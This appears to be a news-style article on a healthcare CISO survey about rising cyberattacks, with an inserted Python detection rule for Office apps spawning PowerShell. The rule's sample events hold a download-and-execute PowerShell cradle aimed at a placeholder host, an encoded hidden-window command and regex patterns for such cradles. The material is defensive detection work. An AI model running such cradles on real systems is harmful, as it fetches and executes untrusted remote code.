A new survey of healthcare CISOs concluded that the bulk of their organizations saw an increase in cyberattacks over the past year, many of which have grown more cunning over time. For those who were derailed by the WannaCry and NotPetya ransomware attacks of 2017, the news won’t come as a surprise.
According to a report by data security company Carbon Black, 83% of survey respondents reported that such attacks have increased, and moreover, 66% said they had become more sophisticated over the past year.
The security firm said that in 2018, its healthcare customers had an average of 8.2 attempted cyberattacks per endpoint each month. This includes attacks hitting often overlooked points such as printers, biomedical devices and imaging suites.
Almost half (45%) of respondents said they had encountered attacks motivated primarily by the destruction of data. Many others were financially driven by the money to be made on underground data sales. Carbon Black found that the hottest dark web market listings for healthcare-related information included provider data, forgeries and hacked health insurance company login information.
Two-thirds of healthcare organizations reported that they were targeted by ransomware attacks during the same period. (Separate research by McAfee suggests that SamSam ransomware attacks were particularly popular last year.) Malicious Office documents, particularly Excel documents with macro-enabled PowerShell delivery cradles, were the most common fileless attack targeting the vendor’s healthcare customers.
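The macro-to-PowerShell pattern described above is one that defenders can catch at the endpoint by watching which process launches PowerShell. The script below is an added example, not code from the article or from Carbon Black: it runs a simple parent/child rule over constructed process-creation records (the field names loosely follow Sysmon Event ID 1 but are assumptions for illustration) and reports why each event was flagged.

```python
"""
Detection sketch: PowerShell launched by an Office application.

Added example, not from the article or from Carbon Black. The event
records and command lines below are constructed test data; field names
(parent_image, image, command_line) are assumptions, not a real schema.
"""
import re
from dataclasses import dataclass

# Office binaries that should almost never be the direct parent of a shell.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that typically appear in download-and-execute cradles.
# Each hit adds a reason string so the analyst can see what tripped the rule.
CRADLE_PATTERNS = {
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\b", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-no(p|profile)\b", re.IGNORECASE),
    "remote_fetch": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.IGNORECASE
    ),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.IGNORECASE),
}


@dataclass
class ProcessEvent:
    event_id: int
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: ProcessEvent) -> list:
    """Return the reasons an event is suspicious; an empty list means benign.

    The base rule is purely structural (Office parent, PowerShell child);
    cradle indicators on the command line are added as extra reasons.
    """
    if _basename(event.parent_image) not in OFFICE_PARENTS:
        return []
    if _basename(event.image) not in POWERSHELL_IMAGES:
        return []
    reasons = ["office_parent_spawned_powershell"]
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(event.command_line):
            reasons.append(name)
    return reasons


def severity(reasons: list) -> str:
    """Coarse triage bucket from the number of reasons collected."""
    if len(reasons) >= 3:
        return "high"
    if len(reasons) == 2:
        return "medium"
    return "low" if reasons else "none"


def flag_events(events) -> dict:
    """Map event_id -> reasons for every event the rule flags."""
    flagged = {}
    for event in events:
        reasons = analyze(event)
        if reasons:
            flagged[event.event_id] = reasons
    return flagged


# Constructed sample events (not real telemetry). The base64 blob is a
# placeholder, and example.invalid is a reserved, non-resolving domain.
OFFICE16 = r"C:\Program Files\Microsoft Office\root\Office16"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(1, OFFICE16 + r"\EXCEL.EXE", PS_PATH,
                 "powershell.exe -nop -w hidden -enc UExBQ0VIT0xERVI="),
    ProcessEvent(2, OFFICE16 + r"\WINWORD.EXE", PS_PATH,
                 "powershell -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/x')\""),
    # Same cradle flags, but launched from Explorer: outside this rule's scope.
    ProcessEvent(3, r"C:\Windows\explorer.exe", PS_PATH,
                 "powershell.exe -nop -enc UExBQ0VIT0xERVI="),
    # Office spawning cmd.exe is not PowerShell; a separate rule would cover it.
    ProcessEvent(4, OFFICE16 + r"\EXCEL.EXE", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),
    # Plain script run from Excel: flagged on structure alone, low severity.
    ProcessEvent(5, OFFICE16 + r"\EXCEL.EXE", PS_PATH,
                 r"powershell.exe -File C:\Scripts\refresh.ps1"),
]

if __name__ == "__main__":
    for event_id, reasons in flag_events(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {severity(reasons)} -> {', '.join(reasons)}")
```

Event 5 shows why the structural rule and the command-line indicators are kept separate: a finance team's scheduled refresh script legitimately launched from Excel will trip the parent/child check, so the indicators are what lift an alert from "review when convenient" to "act now", and the low-severity bucket is where tuning and allow-listing happen.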
One-third of CISOs said they encountered counter incident response during the past year, and the same proportion said they found instances of island hopping in their enterprises over the same period.
To fend off as many of these attacks as possible, 84% of surveyed healthcare organizations train employees on cybersecurity best practices at least once a year, and 45% said they provide training multiple times per year.
Still, the healthcare CISOs didn’t seem particularly pleased with their cybersecurity defenses. When asked to grade their security posture, 33% of CISOs gave themselves a C grade, 25% a B and 16% a B-. If I were a CEO reading the stats, I’m betting these grades wouldn’t please me too much.
Of course, not everyone is quite this pessimistic about the cyber defenses. An unrelated survey by security vendor Infoblox released earlier this year found that 92% of surveyed health IT professionals were confident that their organization was prepared to respond to a cyberattack, up from 82% last year.
As with most things in life, I suspect the truth lies somewhere between these two assessments. By no means are hospitals unprepared to protect their data assets, but clearly the adversaries profiting off these breaches are very determined and clever. All told, it’s not altogether a reassuring picture.